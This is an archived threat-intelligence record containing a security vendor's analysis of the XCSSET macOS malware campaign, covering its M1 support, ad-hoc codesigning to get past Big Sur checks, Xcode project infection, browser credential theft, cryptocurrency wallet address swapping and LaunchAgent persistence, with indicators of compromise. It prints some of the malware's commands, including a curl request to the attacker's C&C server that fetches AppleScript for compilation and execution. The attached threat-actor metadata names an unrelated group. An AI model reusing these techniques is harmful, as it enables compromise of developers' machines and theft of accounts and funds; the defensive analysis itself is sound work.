{ "id": "d08b19b0-90c3-40ba-9306-f392e2d4372f", "created_at": "2026-04-06T00:15:16.823843Z", "updated_at": "2026-04-10T03:36:47.745595Z", "deleted_at": null, "sha1_hash": "09647e43e994defb7e03b2fa2c4f6f9f51e08f2c", "title": "XCSSET Quickly Adapts to macOS 11 and M1 based Macs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1641511, "plain_text": "XCSSET Quickly Adapts to macOS 11 and M1 based Macs\r\nBy Steven Du, Dechao Zhao, Luis Magisa, Ariel Neimond Lazaro ( words)\r\nPublished: 2021-04-16 · Archived: 2026-04-05 21:31:33 UTC\r\nThis latest update details our new research on XCSSET, including the ways in which it has adapted itself to work on both\r\nARM64 and x86_x64 Macs.\r\nBy: Steven Du, Dechao Zhao, Luis Magisa, Ariel Neimond Lazaro Apr 16, 2021 Read time: 8 min (2116 words)\r\nSave to Folio\r\nLast year, we first found XCSSET, which targeted Mac users by infecting Xcode projects. Initially reported as a malware\r\nfamily, in light of our recent findings it is now classified as an ongoing campaign.  This latest update details our new\r\nresearch regarding XCSSET, including the ways in which it has adapted itself to work on both ARM64 and x86_x64 Macs,\r\nas well as other notable payload changes.\r\nIn our first blog post and technical brief on XCSSET, we discussed at length the dangers it posed to Xcode developers and\r\nhow it exploited two macOS vulnerabilities to maximize what it can take from an infected machine. Our follow-up update\r\ncovered the third exploit we found that takes advantage of other popular browsers in macOS to implant a Universal Cross-site Scripting (UXSS) injection.\r\nBig changes for macOS 11 Big Sur\r\nLast November, Apple released its operating system Big Sur alongside new Mac products equipped with ARM-based M1\r\nprocessors. Software with x86_64 architecture can still run on macOS 11 with the help of Rosetta 2, an emulator built into\r\nBig Sur, but most software developers may prefer to update their software so it can support ARM64.\r\nAccording to Kasperskyopen on a new tab, new samples from the malware were discovered that can run on Macs with the\r\nnew M1 chip. We checked the binary files downloaded from the command and control (C\u0026C) server and discovered that\r\nnearly all of them were files containing both x86_x64 and ARM64 architectures, save for three that only had an x86_64\r\narchitecture. Besides adding support for the M1 chip, XCSSET malware has taken other actions to fit macOS 11 Big Sur as\r\nwell.\r\nAs mentioned in our first technical brief, this malware leverages the development version of Safari to load malicious Safari\r\nframeworks and related JavaScript backdoors from its C\u0026C server. It hosts Safari update packages in the C\u0026C server, then\r\ndownloads and installs packages for the user’s OS version. To adapt to the newly-released Big Sur, new packages for “Safari\r\n14” were added (Figure 1). As we’ve observed in safari_remote.applescript, it downloads a corresponding Safari package\r\naccording to the user’s current browser and OS versions (Figure 2). \r\nFigure 1. Safari 14 packages\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 1 of 10\n\nFigure 2. safari_remote.applescript\r\nImitation apps for Big Sur are also created from malicious AppleScript files, in which icon files are downloaded from a\r\nC\u0026C server, then their info.plist files are modified so that the fake app's icon is convincingly disguised as that of the\r\nlegitimate app it's trying to imitate.\r\nThe malware's latest modules, such as the new icons.php module introduces changes to the icons to fit their victim's OS\r\n(Figure 5). For example, a fake Finder's icon for macOS versions 10.15 and lower has a downloaded icon file named\r\nFinder.icns with square corners (Figure 3), whereas macOS 11.1 has a downloaded icon file named FinderBigSur.icns and\r\nhas an icon with rounded corners (Figure 4) to mimic the ones used in Big Sur.\r\nFigure 3. Finder Icon (10.15)\r\nFigure 4. Finder Icon (11.1)\r\nFigure 5. The calling icons.php script\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 2 of 10\n\nGetting past macOS 11’s security features\r\nThe beta 6 version of macOS Big Sur 11 onwards does include new security requirements to better detect any code\r\nmodifications. Executables must now be signed before they are allowed to run, though a simple ad-hoc signature will\r\nsuffice. However, this doesn't apply to translated x86 binaries that run under Rosetta 2, nor a macOS 11 that runs on an Intel-based platform.\r\nIn all AppleScript modules, instead of the open command a new launchApp function is used to execute a fake app made\r\nfrom malicious AppleScript (Figure 6).\r\nFigure 6. The launchApp calling function\r\nBut as we have seen from its source code, the malware can cleverly circumvent macOS 11's new security policies: Its fake\r\napps and files are codesigned with an ad-hoc signature using the codesign --force --deep -s - command. The malware then\r\ndownloads its own open tool from its C\u0026C server that comes pre-signed with an ad-hoc signature, whereas if it were on\r\nmacOS versions 10.15 and lower, it would still use the system's built-in open command to run the apps.\r\nThe main routine of the open tool is as follows:\r\nRequire an app bundle as argument.  For example: open xcode.app\r\nLaunch the {app bundle}\\Contents\\macOS\\applet\r\nCheck if the wait parameter is included, For example: open xcode.app wait\r\nLaunch the {app bundle}\\Contents\\macOS\\applet\r\nContinuously check if the target app is included in the running process using the following commands: /bin/bash -c\r\nps aux | grep -v grep | grep -ci '{app bundle}/Contents/macOS/applet' || echo 0 2\u003e\u00261      \u0026\u003e/dev/null \r\nInterestingly, even though the /usr/bin/open command works fine for fake apps on M1 systems, it still uses its own open\r\ntool.\r\nFigure 7. launchApp script\r\nOther features and payloads of XCSSET\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 3 of 10\n\nDays after we released our second technical brief on this malware, a new domain named \"trendmicronano[.]com” was added\r\nto its C\u0026C server. Although it contains the keywords \"trend micro\", it has nothing to do with Trend Micro. So far, six active\r\nC\u0026C domains share the same IP address of 94[.]130[.]27[.]189:\r\nTitian[.]com\r\nFindmymacs[.]com\r\nStatsmag[.]com\r\nStatsmag[.]xyz\r\nAdoberelations[.]com\r\nTrendmicronano[.]com\r\nbootstrap.applescript\r\nThe bootstrap.applescript module, which is called by binary Pods and contains the logic to call other malicious AppleScript\r\nmodules, has also undergone some noteworthy changes:\r\nMachines with the username \"apple_mac,\" identified as physical machines with the M1 chip, are then used to test if\r\nnew Mach-O files with ARM architecture can work properly on M1 machines (Figure 8)\r\nCalls a new screen_sim module instead of a screen module (Figure 9)\r\nAdded support for Chromium browser (Figure 10)\r\nIn its previous version, we observed that the chrome_data and opera_data modules were only called when the\r\nlanguage contains \"IN\" for India (Figure 11), but in this latest iteration the chrome_data module is called along with\r\nthe replicator module. In addition, the call for opera_data has been commented out (Figure 12)\r\nFigure 8. Testing code for the bootstrap.applescript module\r\nFigure 9. New component of the bootstrap.applescript module\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 4 of 10\n\nFigure 10. The bootstrap.applescript module added support for a new browser\r\nFigure 11. The previous version of the bootstrap.applescript module\r\nFigure 12. The latest version calls the replicator module\r\nreplicator.applescript\r\nThe replicator.applescript module is responsible for injecting local Xcode projects with malicious code. We’ve observed that\r\nthis module uses more varied file names in this latest version compared to its predecessor. The new file names used by this\r\nmodule are as follows:\r\nScript file names:\r\nAssets.xcassets\r\nAsset.xcasset\r\nxcassets.folder\r\nbuild.file\r\nMach-O file name:\r\ncat\r\nThe replicator.applescript module infects Xcode developer projects by inserting a function that calls its malicious\r\ncomponents during the build phase or the build rule. In previous versions, these code snippets inserted in the build phase or\r\nbuild rule were assigned hard-coded IDs, but this latest iteration added a new function that automatically generates random\r\nIDs. According to its logic (Figure 13), this random ID will always end with the postfix “AAC43A,” which is used to\r\nidentify and remove the old infection snippet in preparation for a new infection (Figure 14). We were able to locate 10 public\r\nGitHub repositories infected with this malware, but these all had old hard-coded IDs.  Repositories infected with the latest\r\nvariant have yet to be found.\r\nOriginally, the inserted script during the build phase or build rule calls a bash script file, which refers to Mach-O binary files\r\nas “Pods” (Figure 15). However, in this latest version, the script calls a Mach-O binary file “cat” directly and is assigned the\r\nvalue of the AUTO_CLEAN_PROJ variable, which is currently set to “false” (Figure 16).\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 5 of 10\n\nFigure 13. Random ID Generator\r\nFigure 14. Postfix use case\r\nFigure 15. The previous version of build phase script\r\nFigure 16. The latest version of build phase script\r\nagent.php\r\nIn our analysis of the latest JavaScript codes from agent.php, which hosts many of the codes used in handling requests to\r\nmanipulate browsers, we’ve also discovered that, unlike its previous version, the malware now tries to steal confidential data\r\nfrom the following sites:\r\n163.com\r\nHuobi\r\nbinance.com\r\nnncall.net\r\nEnvato\r\nlogin.live.com\r\nFor cryptocurrency trading platform Huobi, the malware not only steals account information but is now able to replace the\r\naddress in a user’s cryptocurrency wallet — a new feature that did not exist in the previous version (Figure 18).\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 6 of 10\n\nFigure 17. Stealing Envato account information\r\nFigure 18. Replacing Huobi wallet addresses\r\nNew Findings on the Landing Mach-O File\r\nAs previously discussed, we have found that nearly all the binary files that were downloaded directly from the C\u0026C server\r\nhave changed from Mach-O files with an x86_64 architecture to universal binary files with both x86_64 and ARM64\r\narchitectures, with three notable exceptions: “cat” and “Pods” are landing Mach-O binary files triggered by infected Xcode\r\nprojects, while “open” is used to execute all fake apps compiled from malicious AppleScript script files. Upon further\r\ninvestigation, we’ve come across new findings as to why these were not updated to support ARM64:  \r\nThe cat Mach-O binary file is generated by the Shell Script Compiler (shc), an open-source tool used to generate a local\r\nexecutable binary file from an input shell script file. Users can find its source code from GitHub and easily install it using\r\nlocal package management tools like Homebrew for macOS, or Yellowdog Updater Modified (YUM) and apt-get for Linux.\r\nAlthough there is a tool called UnShc that can decompile binary files generated by shc, it doesn’t work well for files from\r\nthe latest version of shc.\r\nBecause of this, we still had to examine the payload from cat using proper debugging methods: First, we got a decrypted\r\nshell script from cat, whose main payload is downloading and executing other Mach-O binary Pods from the C\u0026C server\r\n(Figure 19).  Pods, likewise generated by shc, has the same file size as cat. We used the same debugging methods to procure\r\na decrypted shell script from it.\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 7 of 10\n\nFigure 19. The “cat” Mach-O binary file\r\nOnce decrypted, the shell script from Pods were shown to be quite complicated and able to:\r\n1. 1Connect to https://$TARGET_DOMAIN/apple/prepod.php in an attempt to get remote command. The expected\r\nreturn result is AppleScript string. If the return result doesn’t come up empty, osascript -e is called to execute it. So\r\nfar, the return result has been empty.\r\n2. Read $HOME/Library/Caches/GameKit/.report, and if this file exists, use its contents as the target directory.\r\nOtherwise, it randomly selects a path from the following:\r\n\"$HOME/Library/Application Support/iCloud\" \r\n\"$HOME/Library/Application Scripts/com.apple.AddressBook.Shared\" \r\n\"$HOME/Library/Group Containers/group.com.apple.notes\" \r\n\"$HOME/Library/Containers/com.apple.routerd\"\r\n3. Read $HOME/Library/Caches/GameKit/.plist, and if this file exists, use its contents as the path for a plist file of a\r\npersistent item. Otherwise, it randomly selects a path from the following:\r\n\"$HOME/Library/LaunchAgents/com.apple.net.core.plist\" \r\n\"$HOME/Library/LaunchAgents/com.apple.auditor.plist\" \r\n\"$HOME/Library/LaunchAgents/com.google.keystone.plist\" \r\n\"$HOME/Library/LaunchAgents/com.google.keystone.plist\"\r\n4. Use macOS’s osacompile command to compile embedded AppleScript (Figure 20) to acquire a fake Xcode.app. The\r\nembedded AppleScript contains some encrypted string, making it difficult to read. But after decrypting, we\r\ndiscovered its main payload:\r\n1. Send an http request to com.php by executing a command: curl -sk -d 'user=\r\n\u003cusername\u003e\u0026build_vendor=default\u0026build_version=default' https://\u003cdomainname\u003e/apple/com.php. As a\r\nresult, it obtains a new AppleScript file’s content. Based on this, we believe it to be bootstrap.applescript.\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 8 of 10\n\n2. Use the osacompile -x command to compile the AppleScript content from the curl command to a run-only\r\nAppleScript, then execute it.\r\n5. Create the file $HOME/Library/Caches/GameKit/AppleKit and write the path of Xcode.app’s main Mach-O file\r\n(Contents/macOS/applet) into it.\r\n6. Create the file $TARGET_PLIST_FILE that launches $HOME/Library/Caches/GameKit/AppleKit. Then it calls the\r\nlaunchctl load command to load the plist file, so the AppleKit file is executed, and in turn, execute the fake\r\nXcode.app.\r\n7. Write the following files: \r\n\"$HOME/Library/Caches/GameKit/.report\" – “$TARGETDIR/Xcode.app” compiled by malware\r\n\"$HOME/Library/Caches/GameKit/.plist\" – “$TARGET_PLIST_FILE” persistence created by malware\r\n\"$HOME/Library/Caches/GameKit/.domain\" - domain used by malware\r\n8. Finally, an interesting function in the shell script is clean_proj (Figure 21), which is used to disinfect the current\r\ninfected Xcode project. The calling condition of clean_proj is “$AUTOCLEAN=true”(Figure 22), but as mentioned\r\nearlier, currently the variable’s value is false.\r\nFigure 20. Embedded AppleScript code\r\nFigure 21. Clean_proj for disinfection\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 9 of 10\n\nFigure 22. Disinfect only when AUTOCLEAN is true\r\nTrend Micro Solutions\r\nTo protect systems from this type of threat, users should only download apps from official and legitimate marketplaces.\r\nUsers can also consider multilayered security solutions such as Trend Micro Antivirus for Macproducts and Trend Micro\r\nMaximum Securityproducts, which provides comprehensive security and multidevice protection against cyberthreats.\r\nEnterprises can take advantage of Trend Micro’s Smart Protection Suitesproducts with XGen™ security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity or\r\nendpoint.\r\nIndicators of Compromise\r\nFilename SHA256 Trend Micro Detection N\r\nreplicator.applescript 3631d9485d2e61bb86a71a007d5420d132938cc1f9dacbc6d2eef0dcd8dc040c Trojan.macOS.XCSSET\r\nsafari_remote.applescript 5acf6821d44545bfcd3446e2bdf589bc16972f76cc9137cb364954829df520d2 Trojan.macOS.XCSSET\r\npods_infect.applescript 66057e5672a0e3c564563f99881fc57b604e6c91a992b6a937d0077636200497 Trojan.macOS.XCSSET\r\ncat 74df6fee1c5d18dc8f0dad1263199ab4392088fd5faaae95ae05b377207fff05 TrojanSpy.macOS.XCSS\r\nscreen_sim.applescript 86f3195ea91953e0e560ac474e34218a919c89ba433dc3a1eb935800b2acb7f7 Trojan.macOS.XCSSET\r\nPods shellscript 8aaf02565161bd88f033d2419104a4cb452a4808363b05cdff43b5781f78e01d Trojan.SH.XCSSET.B\r\nPods a018213ac9202119eb7a6d58603f8dbb2fdde26b9639d852e5e426ecbfc3545f TrojanSpy.macOS.XCSS\r\ncat shellscript a191c9657abbc528640bd2217f479fbecb33c85ca0e37a2ea309225bb0cbf2ce Trojan.SH.XCSSET.B\r\nbootstrap.applescript cdbc86b5828fc6e8f9747bbd298bdf19d0047622c9e69f9b0877ee4106b3768 Trojan.macOS.XCSSET\r\nIP/Domain Category\r\n94[.]130[.]27[.]189\r\nC\u0026C Server\r\nAdoberelations[.]com\r\nFindmymacs[.]com \r\nStatsmag[.]com\r\nStatsmag[.]xyz\r\nTitian[.]com\r\nTrendmicronano[.]com\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "references": [ "https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html" ], "report_names": [ "xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434516, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/09647e43e994defb7e03b2fa2c4f6f9f51e08f2c.pdf", "text": "https://archive.orkl.eu/09647e43e994defb7e03b2fa2c4f6f9f51e08f2c.txt", "img": "https://archive.orkl.eu/09647e43e994defb7e03b2fa2c4f6f9f51e08f2c.jpg" } }